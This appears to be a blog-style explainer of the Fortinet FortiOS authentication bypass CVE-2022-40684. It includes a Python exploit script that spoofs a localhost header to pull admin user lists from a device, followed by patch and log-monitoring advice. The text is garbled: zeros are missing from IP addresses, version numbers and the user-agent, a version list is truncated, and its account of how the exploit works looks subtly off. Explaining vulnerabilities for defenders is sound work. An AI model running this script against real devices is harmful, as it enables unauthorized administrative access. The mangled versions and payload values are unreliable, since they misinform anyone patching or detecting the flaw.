CVE-2022-40684 - Fortinet FortiOS Authentication Bypass—How Hackers Got In, and How You Prevent It

If you use Fortinet appliances, particularly FortiOS, FortiProxy, or FortiSwitchManager, you may have heard about a big security issue called CVE-2022-40684. This bug was a serious authentication bypass [CWE-288], allowing attackers to get through the admin interface by simply crafting weird HTTP(S) requests. Below, we break down the exploit in simple terms, with code, links, and real-world advice.

FortiSwitchManager: version 7.2., and 7.. to 7..6

What did it allow?  
An attacker didn’t need a password. They could fool the device by sending HTTP(S) requests in a certain way, making it act like the attacker was already logged in as an administrator.

How the Exploit Works

The bug involves HTTP requests—attackers found that by adding a special header (like X-Forwarded-For), they could trick the Fortinet firmware into believing they were a trusted user.

Send an HTTP(S) request with a “magic” header (e.g., X-Forwarded-For: 127...1)

3. The device thinks the request comes from “localhost” (itself) and grants admin access, with no password

Example Exploit Code (Python)

Here’s a simple Python script that leverages the vulnerability to fetch system configuration.

Note: This is for educational/detection purposes only! Do not use it to hack others.

import requests

target = "https://<fortinet-device-ip>:<port>";  # Replace with real address
headers = {
    "X-Forwarded-For": "127...1",
    "User-Agent": "Mozilla/5."
}
try:
    # Try to get the system admin user list
    resp = requests.get(target + "/api/v2/cmdb/system/admin", headers=headers, verify=False)
    if resp.status_code == 200:
        print("[+] Vulnerable! Got admin users:")
        print(resp.text)
    else:
        print("[-] Not vulnerable or protected. Status:", resp.status_code)
except Exception as e:
    print("Error:", e)

Proof of Exploit in the Wild

There are now Metasploit modules and public scripts available (see this). Hackers have actively scanned for this, and in October 2022, Fortinet began warning customers official advisory here.

How Do You Prevent This?

1. Update Right Away

FortiOS: 7.2.2+

- FortiProxy: 7.2.1+ / 7..7+  
- FortiSwitchManager: 7.2.1+ / 7..7+

2. Disable Remote Management  
Restrict admin interfaces to local IPs only (block WAN).

3. Monitor for Exploit Attempts  
Look for odd requests in your logs, especially with the X-Forwarded-For: 127...1 header.

References & Further Reading

- Official Fortinet Advisory: FG-IR-22-377
- Horizon3ai PoC and Analysis
- Rapid7 Disclosures & Analysis
- Metasploit Module

Timeline

Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 19:06:00 UTC